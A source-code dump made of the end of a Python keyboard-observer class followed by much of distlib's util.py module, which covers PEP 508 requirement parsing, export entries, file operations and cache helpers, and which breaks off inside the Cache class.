        """
        # in_state is either an empty list (if no input is available)
        # of a list containing only sys.stdin (if input is available).
        # Input will only be available upon pressing return!
        in_state, _o, _e = select.select([sys.stdin], [], [], timeout)
        if in_state:
            self.key_pressed = sys.stdin.readline().strip()
            # NOTE(review): debug print in library code -- consider
            # replacing with LOG.debug.
            print("You said", self.key_pressed)
class GetchKeyboardObserver(LoopKeyboardObserver):
    """A :py:class:`KeyboardObserver` using the (third party) `getch`
    module to check if a key was pressed.

    NOTE(review): the getch-based implementation is stubbed out (the
    import is commented), so this observer currently never records a key.
    """

    def _check_for_key(self, timeout=.1) -> None:
        """Run a loop to capture a key.
        """
        # from getch import getch
        self.key_pressed = None  # getch()
|
util.py | #
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode,
unquote, urlparse)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
# Token regexes for the PEP 508 grammar used by parse_marker /
# parse_requirement below; each anchors at the start of the remaining input.
IDENTIFIER = re.compile(r'^([\w\.-]+)\s*')            # distribution / marker-variable names
VERSION_IDENTIFIER = re.compile(r'^([\w\.*+-]+)\s*')  # version strings (may contain '*')
COMPARE_OP = re.compile(r'^(<=?|>=?|={2,3}|[~!]=)\s*')  # version comparison operators
MARKER_OP = re.compile(r'^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*')  # marker operators
OR = re.compile(r'^or\b\s*')
AND = re.compile(r'^and\b\s*')
NON_SPACE = re.compile(r'(\S+)\s*')                   # one whitespace-delimited token
STRING_CHUNK = re.compile(r'([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)')  # body of a quoted literal
def parse_marker(marker_string):
    """
    Parse a marker string and return a dictionary containing a marker expression.

    The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
    the expression grammar, or strings. A string contained in quotes is to be
    interpreted as a literal string, and a string not contained in quotes is a
    variable (such as os_name).
    """
    # Recursive-descent parser; each helper consumes from the front of
    # the input and returns (parsed-value, remaining-input).

    def marker_var(remaining):
        # One operand: either an identifier, or a quoted string literal
        # (returned with its surrounding quotes).
        m = IDENTIFIER.match(remaining)
        if m:
            result = m.groups()[0]
            remaining = remaining[m.end():]
        elif not remaining:
            raise SyntaxError('unexpected end of input')
        else:
            q = remaining[0]
            if q not in '\'"':
                raise SyntaxError('invalid expression: %s' % remaining)
            oq = '\'"'.replace(q, '')  # the *other* quote character
            remaining = remaining[1:]
            parts = [q]
            while remaining:
                # either a string chunk, or oq, or q to terminate
                if remaining[0] == q:
                    break
                elif remaining[0] == oq:
                    parts.append(oq)
                    remaining = remaining[1:]
                else:
                    m = STRING_CHUNK.match(remaining)
                    if not m:
                        raise SyntaxError('error in string literal: %s' % remaining)
                    parts.append(m.groups()[0])
                    remaining = remaining[m.end():]
            else:
                # loop exhausted the input without finding the closing quote
                s = ''.join(parts)
                raise SyntaxError('unterminated string: %s' % s)
            parts.append(q)
            result = ''.join(parts)
            remaining = remaining[1:].lstrip()  # skip past closing quote
        return result, remaining

    def marker_expr(remaining):
        # A parenthesised marker, or a left-associative chain of
        # comparisons between marker_var operands.
        if remaining and remaining[0] == '(':
            result, remaining = marker(remaining[1:].lstrip())
            if remaining[0] != ')':
                raise SyntaxError('unterminated parenthesis: %s' % remaining)
            remaining = remaining[1:].lstrip()
        else:
            lhs, remaining = marker_var(remaining)
            while remaining:
                m = MARKER_OP.match(remaining)
                if not m:
                    break
                op = m.groups()[0]
                remaining = remaining[m.end():]
                rhs, remaining = marker_var(remaining)
                lhs = {'op': op, 'lhs': lhs, 'rhs': rhs}
            result = lhs
        return result, remaining

    def marker_and(remaining):
        # marker_expr ('and' marker_expr)*
        lhs, remaining = marker_expr(remaining)
        while remaining:
            m = AND.match(remaining)
            if not m:
                break
            remaining = remaining[m.end():]
            rhs, remaining = marker_expr(remaining)
            lhs = {'op': 'and', 'lhs': lhs, 'rhs': rhs}
        return lhs, remaining

    def marker(remaining):
        # marker_and ('or' marker_and)* -- 'or' binds loosest.
        lhs, remaining = marker_and(remaining)
        while remaining:
            m = OR.match(remaining)
            if not m:
                break
            remaining = remaining[m.end():]
            rhs, remaining = marker_and(remaining)
            lhs = {'op': 'or', 'lhs': lhs, 'rhs': rhs}
        return lhs, remaining

    return marker(marker_string)
def parse_requirement(req):
    """
    Parse a requirement passed in as a string. Return a Container
    whose attributes contain the various parts of the requirement.

    Returns None for blank lines and comment-only lines. Raises
    SyntaxError on malformed input.
    """
    remaining = req.strip()
    if not remaining or remaining.startswith('#'):
        return None
    m = IDENTIFIER.match(remaining)
    if not m:
        raise SyntaxError('name expected: %s' % remaining)
    distname = m.groups()[0]
    remaining = remaining[m.end():]
    extras = mark_expr = versions = uri = None
    # optional extras: [extra1, extra2, ...]
    if remaining and remaining[0] == '[':
        i = remaining.find(']', 1)
        if i < 0:
            raise SyntaxError('unterminated extra: %s' % remaining)
        s = remaining[1:i]
        remaining = remaining[i + 1:].lstrip()
        extras = []
        while s:
            m = IDENTIFIER.match(s)
            if not m:
                raise SyntaxError('malformed extra: %s' % s)
            extras.append(m.groups()[0])
            s = s[m.end():]
            if not s:
                break
            if s[0] != ',':
                raise SyntaxError('comma expected in extras: %s' % s)
            s = s[1:].lstrip()
        if not extras:
            extras = None
    if remaining:
        if remaining[0] == '@':
            # it's a URI
            remaining = remaining[1:].lstrip()
            m = NON_SPACE.match(remaining)
            if not m:
                raise SyntaxError('invalid URI: %s' % remaining)
            uri = m.groups()[0]
            t = urlparse(uri)
            # there are issues with Python and URL parsing, so this test
            # is a bit crude. See bpo-20271, bpo-23505. Python doesn't
            # always parse invalid URLs correctly - it should raise
            # exceptions for malformed URLs
            if not (t.scheme and t.netloc):
                raise SyntaxError('Invalid URL: %s' % uri)
            remaining = remaining[m.end():].lstrip()
        else:

            def get_versions(ver_remaining):
                """
                Return a list of operator, version tuples if any are
                specified, else None.
                """
                m = COMPARE_OP.match(ver_remaining)
                versions = None
                if m:
                    versions = []
                    while True:
                        op = m.groups()[0]
                        ver_remaining = ver_remaining[m.end():]
                        m = VERSION_IDENTIFIER.match(ver_remaining)
                        if not m:
                            raise SyntaxError('invalid version: %s' % ver_remaining)
                        v = m.groups()[0]
                        versions.append((op, v))
                        ver_remaining = ver_remaining[m.end():]
                        # a ',' separates additional (op, version) clauses
                        if not ver_remaining or ver_remaining[0] != ',':
                            break
                        ver_remaining = ver_remaining[1:].lstrip()
                        m = COMPARE_OP.match(ver_remaining)
                        if not m:
                            raise SyntaxError('invalid constraint: %s' % ver_remaining)
                    if not versions:
                        versions = None
                return versions, ver_remaining

            if remaining[0] != '(':
                versions, remaining = get_versions(remaining)
            else:
                i = remaining.find(')', 1)
                if i < 0:
                    raise SyntaxError('unterminated parenthesis: %s' % remaining)
                s = remaining[1:i]
                remaining = remaining[i + 1:].lstrip()
                # As a special diversion from PEP 508, allow a version number
                # a.b.c in parentheses as a synonym for ~= a.b.c (because this
                # is allowed in earlier PEPs)
                if COMPARE_OP.match(s):
                    versions, _ = get_versions(s)
                else:
                    m = VERSION_IDENTIFIER.match(s)
                    if not m:
                        raise SyntaxError('invalid constraint: %s' % s)
                    v = m.groups()[0]
                    s = s[m.end():].lstrip()
                    if s:
                        raise SyntaxError('invalid constraint: %s' % s)
                    versions = [('~=', v)]
    if remaining:
        # everything after ';' is an environment marker expression
        if remaining[0] != ';':
            raise SyntaxError('invalid requirement: %s' % remaining)
        remaining = remaining[1:].lstrip()
        mark_expr, remaining = parse_marker(remaining)
    if remaining and remaining[0] != '#':
        raise SyntaxError('unexpected trailing data: %s' % remaining)
    # rs: a normalized "name op version, op version" display string
    if not versions:
        rs = distname
    else:
        rs = '%s %s' % (distname, ', '.join(['%s %s' % con for con in versions]))
    return Container(name=distname, extras=extras, constraints=versions,
                     marker=mark_expr, url=uri, requirement=rs)
def get_resources_dests(resources_root, rules):
    """Find destinations for resources files.

    *rules* is an iterable of (base, glob-suffix, dest) triples; later
    rules may override earlier entries, and dest=None removes an entry.
    Returns {relative-resource-path: relative-destination-path}.

    NOTE(review): 'iglob' here is presumably the extended-glob helper
    defined elsewhere in this module (with '**' support), not
    glob.iglob directly -- confirm against the full file.
    """
    def get_rel_path(root, path):
        # normalizes and returns a lstripped-/-separated path
        root = root.replace(os.path.sep, '/')
        path = path.replace(os.path.sep, '/')
        assert path.startswith(root)
        return path[len(root):].lstrip('/')

    destinations = {}
    for base, suffix, dest in rules:
        prefix = os.path.join(resources_root, base)
        for abs_base in iglob(prefix):
            abs_glob = os.path.join(abs_base, suffix)
            for abs_path in iglob(abs_glob):
                resource_file = get_rel_path(resources_root, abs_path)
                if dest is None:  # remove the entry if it was here
                    destinations.pop(resource_file, None)
                else:
                    rel_path = get_rel_path(abs_base, abs_path)
                    rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
                    destinations[resource_file] = rel_dest + '/' + rel_path
    return destinations
def in_venv():
    """Return True when running inside a virtual environment.

    Detects classic virtualenv (which sets ``sys.real_prefix``) as well
    as PEP 405 venvs (where ``sys.prefix`` differs from
    ``sys.base_prefix``).
    """
    if hasattr(sys, 'real_prefix'):
        # virtualenv-style environment
        return True
    # PEP 405 venv; on a plain interpreter base_prefix equals prefix
    return sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
def get_executable():
    """Return the case-normalized path of the running interpreter,
    decoded to text if the platform hands us bytes."""
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
#    if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
#                                     in os.environ):
#        result = os.environ['__PYVENV_LAUNCHER__']
#    else:
#        result = sys.executable
#    return result
    result = os.path.normcase(sys.executable)
    if not isinstance(result, text_type):
        result = fsdecode(result)
    return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
    """Prompt the user until a reply starting with one of *allowed_chars*
    is given; return that (lowercased) first character.

    An empty reply selects *default* when one is provided; a rejected
    reply re-displays the prompt, prefixed with *error_prompt* if set.
    """
    p = prompt
    while True:
        answer = raw_input(p)
        p = prompt
        if not answer and default:
            answer = default
        if not answer:
            continue  # nothing entered and no default: ask again
        c = answer[0].lower()
        if c in allowed_chars:
            return c
        if error_prompt:
            p = '%c: %s\n%s' % (c, error_prompt, prompt)
def extract_by_key(d, keys):
    """Return a new dict containing only *keys* taken from *d*.

    *keys* may be a sequence of keys or a single whitespace-separated
    string; keys absent from *d* are silently skipped.
    """
    if isinstance(keys, string_types):
        keys = keys.split()
    return {key: d[key] for key in keys if key in d}
def read_exports(stream):
    """Read an exports specification from *stream*.

    Tries the JSON layout ('python.exports' extension) first; on any
    failure falls back to the legacy INI format. Returns a dict mapping
    group name -> {entry name: ExportEntry}.
    """
    if sys.version_info[0] >= 3:
        # needs to be a text stream
        stream = codecs.getreader('utf-8')(stream)
    # Try to load as JSON, falling back on legacy format
    data = stream.read()
    stream = StringIO(data)
    try:
        jdata = json.load(stream)
        result = jdata['extensions']['python.exports']['exports']
        # Replace each "name = value" string with a parsed ExportEntry.
        for group, entries in result.items():
            for k, v in entries.items():
                s = '%s = %s' % (k, v)
                entry = get_export_entry(s)
                assert entry is not None
                entries[k] = entry
        return result
    except Exception:
        # not JSON: rewind and fall through to the INI parser below
        stream.seek(0, 0)

    def read_stream(cp, stream):
        # read_file is the Python 3 spelling; readfp the Python 2 one
        if hasattr(cp, 'read_file'):
            cp.read_file(stream)
        else:
            cp.readfp(stream)

    cp = configparser.ConfigParser()
    try:
        read_stream(cp, stream)
    except configparser.MissingSectionHeaderError:
        # tolerate indented legacy files: dedent the text and retry
        stream.close()
        data = textwrap.dedent(data)
        stream = StringIO(data)
        read_stream(cp, stream)

    result = {}
    for key in cp.sections():
        result[key] = entries = {}
        for name, value in cp.items(key):
            s = '%s = %s' % (name, value)
            entry = get_export_entry(s)
            assert entry is not None
            #entry.dist = self
            entries[name] = entry
    return result
def write_exports(exports, stream):
    """Write *exports* (group -> {name: ExportEntry}) to *stream* in the
    legacy INI format, one section per group."""
    if sys.version_info[0] >= 3:
        # needs to be a text stream
        stream = codecs.getwriter('utf-8')(stream)
    cp = configparser.ConfigParser()
    for k, v in exports.items():
        # TODO check k, v for valid values
        cp.add_section(k)
        for entry in v.values():
            # serialized form: prefix[:suffix] [flag1, flag2]
            if entry.suffix is None:
                s = entry.prefix
            else:
                s = '%s:%s' % (entry.prefix, entry.suffix)
            if entry.flags:
                s = '%s [%s]' % (s, ', '.join(entry.flags))
            cp.set(k, entry.name, s)
    cp.write(stream)
@contextlib.contextmanager
def tempdir():
    """Context manager: create a temporary directory and remove it
    (with all contents) on exit."""
    path = tempfile.mkdtemp()
    try:
        yield path
    finally:
        shutil.rmtree(path)
@contextlib.contextmanager
def chdir(d):
    """Context manager: change the working directory to *d*, restoring
    the previous directory on exit (even on error)."""
    previous = os.getcwd()
    try:
        os.chdir(d)
        yield
    finally:
        os.chdir(previous)
@contextlib.contextmanager
def socket_timeout(seconds=15):
    """Context manager: set the global default socket timeout to
    *seconds*, restoring the previous value on exit."""
    saved = socket.getdefaulttimeout()
    try:
        socket.setdefaulttimeout(seconds)
        yield
    finally:
        socket.setdefaulttimeout(saved)
class cached_property(object):
    """Descriptor that computes a value once per instance, then stores
    it on the instance so later lookups bypass the descriptor."""

    def __init__(self, func):
        self.func = func

    def __get__(self, obj, cls=None):
        """Return the cached value for *obj*, computing and storing it
        on first access; return the descriptor itself on class access."""
        if obj is None:
            return self
        result = self.func(obj)
        # Store on the instance, shadowing this (non-data) descriptor.
        object.__setattr__(obj, self.func.__name__, result)
        return result
def convert_path(pathname):
    """Return 'pathname' as a name that will work on the native filesystem.

    The path is split on '/' and put back together again using the current
    directory separator. Needed because filenames in the setup script are
    always supplied in Unix style, and have to be converted to the local
    convention before we can actually use them in the filesystem. Raises
    ValueError on non-Unix-ish systems if 'pathname' either starts or
    ends with a slash.
    """
    if os.sep == '/' or not pathname:
        return pathname
    if pathname.startswith('/'):
        raise ValueError("path '%s' cannot be absolute" % pathname)
    if pathname.endswith('/'):
        raise ValueError("path '%s' cannot end with '/'" % pathname)
    # drop any '.' components, then rejoin with the native separator
    components = [part for part in pathname.split('/') if part != os.curdir]
    if not components:
        return os.curdir
    return os.path.join(*components)
class FileOperator(object):
    """Performs file-system operations (copy, write, byte-compile,
    remove, chmod) with an optional dry-run mode and optional recording
    of files written / directories created for later commit/rollback."""

    def __init__(self, dry_run=False):
        # when dry_run is True, operations are logged but not performed
        self.dry_run = dry_run
        # directories already checked/created by ensure_dir
        self.ensured = set()
        self._init_record()

    def _init_record(self):
        """Reset recording state: recording off, empty change sets."""
        self.record = False
        self.files_written = set()
        self.dirs_created = set()

    def record_as_written(self, path):
        """Remember *path* as a written file, if recording is enabled."""
        if self.record:
            self.files_written.add(path)

    def newer(self, source, target):
        """Tell if the target is newer than the source.

        Returns true if 'source' exists and is more recently modified than
        'target', or if 'source' exists and 'target' doesn't.

        Returns false if both exist and 'target' is the same age or younger
        than 'source'. Raise PackagingFileError if 'source' does not exist.

        Note that this test is not very accurate: files created in the same
        second will have the same "age".
        """
        if not os.path.exists(source):
            raise DistlibException("file '%r' does not exist" %
                                   os.path.abspath(source))
        if not os.path.exists(target):
            return True
        return os.stat(source).st_mtime > os.stat(target).st_mtime

    def copy_file(self, infile, outfile, check=True):
        """Copy a file respecting dry-run and force flags.
        """
        self.ensure_dir(os.path.dirname(outfile))
        logger.info('Copying %s to %s', infile, outfile)
        if not self.dry_run:
            msg = None
            if check:
                # refuse to clobber symlinks or non-regular files
                if os.path.islink(outfile):
                    msg = '%s is a symlink' % outfile
                elif os.path.exists(outfile) and not os.path.isfile(outfile):
                    msg = '%s is a non-regular file' % outfile
            if msg:
                raise ValueError(msg + ' which would be overwritten')
            shutil.copyfile(infile, outfile)
        self.record_as_written(outfile)

    def copy_stream(self, instream, outfile, encoding=None):
        """Copy the contents of *instream* to the file *outfile*;
        *encoding* selects encoded-text vs binary output."""
        assert not os.path.isdir(outfile)
        self.ensure_dir(os.path.dirname(outfile))
        logger.info('Copying stream %s to %s', instream, outfile)
        if not self.dry_run:
            if encoding is None:
                outstream = open(outfile, 'wb')
            else:
                outstream = codecs.open(outfile, 'w', encoding=encoding)
            try:
                shutil.copyfileobj(instream, outstream)
            finally:
                outstream.close()
        self.record_as_written(outfile)

    def write_binary_file(self, path, data):
        """Write bytes *data* to *path*, replacing any existing file."""
        self.ensure_dir(os.path.dirname(path))
        if not self.dry_run:
            if os.path.exists(path):
                os.remove(path)
            with open(path, 'wb') as f:
                f.write(data)
        self.record_as_written(path)

    def write_text_file(self, path, data, encoding):
        """Write text *data* to *path* using *encoding*."""
        self.write_binary_file(path, data.encode(encoding))

    def set_mode(self, bits, mask, files):
        """OR *bits* into each file's mode, masked by *mask* (POSIX only)."""
        if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
            # Set the executable bits (owner, group, and world) on
            # all the files specified.
            for f in files:
                if self.dry_run:
                    logger.info("changing mode of %s", f)
                else:
                    mode = (os.stat(f).st_mode | bits) & mask
                    logger.info("changing mode of %s to %o", f, mode)
                    os.chmod(f, mode)

    # convenience: mark files r-x for owner, group and world
    set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)

    def ensure_dir(self, path):
        """Create *path* (and missing parents, recursively) if needed,
        honouring dry-run and recording created directories."""
        path = os.path.abspath(path)
        if path not in self.ensured and not os.path.exists(path):
            self.ensured.add(path)
            d, f = os.path.split(path)
            self.ensure_dir(d)
            logger.info('Creating %s' % path)
            if not self.dry_run:
                os.mkdir(path)
            if self.record:
                self.dirs_created.add(path)

    def byte_compile(self, path, optimize=False, force=False, prefix=None, hashed_invalidation=False):
        """Byte-compile *path* to its __pycache__ location and return the
        .pyc path. *prefix* is stripped from the name used in compile
        diagnostics; *hashed_invalidation* selects PEP 552 hash-based
        invalidation where available."""
        dpath = cache_from_source(path, not optimize)
        logger.info('Byte-compiling %s to %s', path, dpath)
        if not self.dry_run:
            if force or self.newer(path, dpath):
                if not prefix:
                    diagpath = None
                else:
                    assert path.startswith(prefix)
                    diagpath = path[len(prefix):]
                compile_kwargs = {}
                if hashed_invalidation and hasattr(py_compile, 'PycInvalidationMode'):
                    compile_kwargs['invalidation_mode'] = py_compile.PycInvalidationMode.CHECKED_HASH
                py_compile.compile(path, dpath, diagpath, True, **compile_kwargs)  # raise error
        self.record_as_written(dpath)
        return dpath

    def ensure_removed(self, path):
        """Remove the file, link or directory tree at *path*, keeping
        the recorded change sets consistent."""
        if os.path.exists(path):
            if os.path.isdir(path) and not os.path.islink(path):
                logger.debug('Removing directory tree at %s', path)
                if not self.dry_run:
                    shutil.rmtree(path)
                if self.record:
                    if path in self.dirs_created:
                        self.dirs_created.remove(path)
            else:
                if os.path.islink(path):
                    s = 'link'
                else:
                    s = 'file'
                logger.debug('Removing %s %s', s, path)
                if not self.dry_run:
                    os.remove(path)
                if self.record:
                    if path in self.files_written:
                        self.files_written.remove(path)

    def is_writable(self, path):
        """Return True if *path* -- or, when it doesn't exist, its
        nearest existing ancestor -- is writable."""
        result = False
        while not result:
            if os.path.exists(path):
                result = os.access(path, os.W_OK)
                break
            parent = os.path.dirname(path)
            if parent == path:  # reached the filesystem root
                break
            path = parent
        return result

    def commit(self):
        """
        Commit recorded changes, turn off recording, return
        changes.
        """
        assert self.record
        result = self.files_written, self.dirs_created
        self._init_record()
        return result

    def rollback(self):
        """Undo recorded changes: delete the written files and the
        created directories (tolerating leftover __pycache__ dirs)."""
        if not self.dry_run:
            for f in list(self.files_written):
                if os.path.exists(f):
                    os.remove(f)
            # dirs should all be empty now, except perhaps for
            # __pycache__ subdirs
            # reverse so that subdirs appear before their parents
            dirs = sorted(self.dirs_created, reverse=True)
            for d in dirs:
                flist = os.listdir(d)
                if flist:
                    assert flist == ['__pycache__']
                    sd = os.path.join(d, flist[0])
                    os.rmdir(sd)
                os.rmdir(d)  # should fail if non-empty
        self._init_record()
def resolve(module_name, dotted_path):
    """Resolve *dotted_path* (e.g. 'a.b.c') as attributes of module
    *module_name*; return the module itself when *dotted_path* is None.

    Note: for a dotted *module_name* that is not yet imported,
    ``__import__`` returns the top-level package.
    """
    if module_name in sys.modules:
        mod = sys.modules[module_name]
    else:
        mod = __import__(module_name)
    if dotted_path is None:
        return mod
    obj = mod
    for attr in dotted_path.split('.'):
        obj = getattr(obj, attr)
    return obj
class ExportEntry(object):
    """A parsed export / entry-point specification of the form
    ``name = prefix:suffix [flag1, flag2]``."""

    def __init__(self, name, prefix, suffix, flags):
        self.name = name      # entry name
        self.prefix = prefix  # dotted module path
        self.suffix = suffix  # attribute path within the module, or None
        self.flags = flags    # list of flag strings (possibly empty)

    @cached_property
    def value(self):
        """The object this entry points at, imported lazily and cached."""
        return resolve(self.prefix, self.suffix)

    def __repr__(self):  # pragma: no cover
        return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
                                                self.suffix, self.flags)

    def __eq__(self, other):
        if not isinstance(other, ExportEntry):
            result = False
        else:
            result = (self.name == other.name and
                      self.prefix == other.prefix and
                      self.suffix == other.suffix and
                      self.flags == other.flags)
        return result

    # keep identity-based hashing even though __eq__ compares by value
    __hash__ = object.__hash__
# Matches "name = module[:attrs] [flag1, flag2=v]" (whitespace-tolerant,
# verbose mode so the literal layout below is insignificant).
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
                      \s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
                      \s*(\[\s*(?P<flags>[\w-]+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
                      ''', re.VERBOSE)

def get_export_entry(specification):
    """Parse ``name = module:attrs [flags]`` into an ExportEntry.

    Returns None when *specification* doesn't look like an export at
    all; raises DistlibException when it is malformed (stray brackets,
    or more than one ':' in the callable part).
    """
    m = ENTRY_RE.search(specification)
    if not m:
        result = None
        if '[' in specification or ']' in specification:
            raise DistlibException("Invalid specification "
                                   "'%s'" % specification)
    else:
        d = m.groupdict()
        name = d['name']
        path = d['callable']
        colons = path.count(':')
        if colons == 0:
            # bare module path: no attribute suffix
            prefix, suffix = path, None
        else:
            if colons != 1:
                raise DistlibException("Invalid specification "
                                       "'%s'" % specification)
            prefix, suffix = path.split(':')
        flags = d['flags']
        if flags is None:
            # brackets present but flags group empty -> malformed
            if '[' in specification or ']' in specification:
                raise DistlibException("Invalid specification "
                                       "'%s'" % specification)
            flags = []
        else:
            flags = [f.strip() for f in flags.split(',')]
        result = ExportEntry(name, prefix, suffix, flags)
    return result
def get_cache_base(suffix=None):
    """
    Return the default base location for distlib caches. If the directory does
    not exist, it is created. Use the suffix provided for the base directory,
    and default to '.distlib' if it isn't provided.

    On Windows, if LOCALAPPDATA is defined in the environment, then it is
    assumed to be a directory, and will be the parent directory of the result.

    On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
    directory - using os.expanduser('~') - will be the parent directory of
    the result.

    The result is just the directory '.distlib' in the parent directory as
    determined above, or with the name specified with ``suffix``.
    """
    if suffix is None:
        suffix = '.distlib'
    if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
        result = os.path.expandvars('$localappdata')
    else:
        # Assume posix, or old Windows
        result = os.path.expanduser('~')
    # we use 'isdir' instead of 'exists', because we want to
    # fail if there's a file with that name
    if os.path.isdir(result):
        usable = os.access(result, os.W_OK)
        if not usable:
            logger.warning('Directory exists but is not writable: %s', result)
    else:
        try:
            os.makedirs(result)
            usable = True
        except OSError:
            logger.warning('Unable to create %s', result, exc_info=True)
            usable = False
    if not usable:
        # fall back to a fresh temp directory rather than failing outright
        result = tempfile.mkdtemp()
        logger.warning('Default location unusable, using %s', result)
    return os.path.join(result, suffix)
def path_to_cache_dir(path):
    """
    Convert an absolute path to a directory name for use in a cache.

    The algorithm used is:

    #. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
    #. Any occurrence of ``os.sep`` is replaced with ``'--'``.
    #. ``'.cache'`` is appended.
    """
    drive, tail = os.path.splitdrive(os.path.abspath(path))
    if drive:
        drive = drive.replace(':', '---')
    return drive + tail.replace(os.sep, '--') + '.cache'
def ensure_slash(s):
    """Return *s* unchanged if it already ends in '/', else append one."""
    return s if s.endswith('/') else s + '/'
def parse_credentials(netloc):
    """Split a 'user:pass@host' netloc into (username, password, host).

    The credential parts are percent-decoded; either may be None when
    absent.
    """
    username = password = None
    if '@' in netloc:
        creds, netloc = netloc.rsplit('@', 1)
        if ':' in creds:
            username, password = creds.split(':', 1)
        else:
            username = creds
    if username:
        username = unquote(username)
    if password:
        password = unquote(password)
    return username, password, netloc
def get_process_umask():
    """Return the process umask without permanently changing it.

    os.umask can only be read by writing: set a dummy value, then
    immediately restore the original.
    """
    current = os.umask(0o22)
    os.umask(current)
    return current
def is_string_sequence(seq):
    """Return True if every element of *seq* is a string.

    Note: *seq* must be non-empty -- the trailing assert fires (in
    non-optimized runs) for an empty sequence.
    """
    result = True
    i = None
    for i, s in enumerate(seq):
        if not isinstance(s, string_types):
            result = False
            break
    assert i is not None
    return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
                                      '([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')

def split_filename(filename, project_name=None):
    """
    Extract name, version, python version from a filename (no extension)

    Return name, version, pyver or None
    """
    pyver = None
    filename = unquote(filename).replace(' ', '-')
    # Peel off a trailing '-pyX.Y' marker first, if present.
    py_marker = PYTHON_VERSION.search(filename)
    if py_marker:
        pyver = py_marker.group(1)
        filename = filename[:py_marker.start()]
    # Prefer an exact match against the known project name, if given.
    if project_name and len(filename) > len(project_name) + 1:
        exact = re.match(re.escape(project_name) + r'\b', filename)
        if exact:
            end = exact.end()
            return filename[:end], filename[end + 1:], pyver
    # Otherwise fall back to the generic name-version pattern.
    generic = PROJECT_NAME_AND_VERSION.match(filename)
    if generic:
        return generic.group(1), generic.group(3), pyver
    return None
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
                             r'\(\s*(?P<ver>[^\s)]+)\)$')

def parse_name_and_version(p):
    """
    A utility method used to get name and version from a string.
    From e.g. a Provides-Dist value.

    :param p: A value in a form 'foo (1.0)'
    :return: The name and version as a tuple.
    """
    match = NAME_VERSION_RE.match(p)
    if match is None:
        raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
    groups = match.groupdict()
    return groups['name'].strip().lower(), groups['ver']
def get_extras(requested, available):
    """Resolve a requested set of extras against the declared ones.

    Supports '*' (include every declared extra) and '-name' (drop a
    previously included extra); undeclared extras are still honoured
    but logged as warnings.
    """
    result = set()
    requested = set(requested or [])
    available = set(available or [])
    if '*' in requested:
        requested.remove('*')
        result |= available
    for name in requested:
        if name == '-':
            result.add(name)
        elif name.startswith('-'):
            unwanted = name[1:]
            if unwanted not in available:
                logger.warning('undeclared extra: %s' % unwanted)
            result.discard(unwanted)
        else:
            if name not in available:
                logger.warning('undeclared extra: %s' % name)
            result.add(name)
    return result
#
# Extended metadata functionality
#

def _get_external_data(url):
    """Fetch JSON metadata from *url*, returning {} on any failure.

    Best-effort: network errors, non-JSON content types and decode
    errors are logged (with traceback) and swallowed.
    """
    result = {}
    try:
        # urlopen might fail if it runs into redirections,
        # because of Python issue #13696. Fixed in locators
        # using a custom redirect handler.
        resp = urlopen(url)
        headers = resp.info()
        ct = headers.get('Content-Type')
        if not ct.startswith('application/json'):
            logger.debug('Unexpected response for JSON request: %s', ct)
        else:
            reader = codecs.getreader('utf-8')(resp)
            #data = reader.read().decode('utf-8')
            #result = json.loads(data)
            result = json.load(reader)
    except Exception as e:
        logger.exception('Failed to get external data for %s: %s', url, e)
    return result
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'

def get_project_data(name):
    """
    Fetch the externally-hosted JSON metadata for project *name*.

    :return: The decoded data, or an empty dict on any failure.
    """
    relative = '%s/%s/project.json' % (name[0].upper(), name)
    return _get_external_data(urljoin(_external_data_base_url, relative))
def get_package_data(name, version):
    """
    Fetch the externally-hosted JSON metadata for release *version* of
    project *name*.

    :return: The decoded data, or an empty dict on any failure.
    """
    relative = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
    return _get_external_data(urljoin(_external_data_base_url, relative))
class Cache(object):
    """
    A class implementing a cache for resources that need to live in the file system
    e.g. shared libraries. This class was moved from resources to here because it
    could be used by other modules, e.g. the wheel module.
    """

    def __init__(self, base):
        """
        Initialise an instance.

        :param base: The base directory where the cache should be located.
        """
        # we use 'isdir' instead of 'exists', because we want to
        # fail if there's a file with that name
        if not os.path.isdir(base):  # pragma: no cover
            os.makedirs(base)
        # Warn when group/other permission bits are set: the cache is
        # meant to be private to the user.
        if (os.stat(base).st_mode & 0o77) != 0:
            logger.warning('Directory \'%s\' is not private', base)
        self.base = os.path.abspath(os.path.normpath(base))

    def prefix_to_dir(self, prefix):
        """
        Converts a resource prefix to a directory name in the cache.
        """
        return path_to_cache_dir(prefix)

    def clear(self):
        """
        Remove all cached entries.

        :return: A list of the paths that could not be removed.
        """
        failures = []
        for entry in os.listdir(self.base):
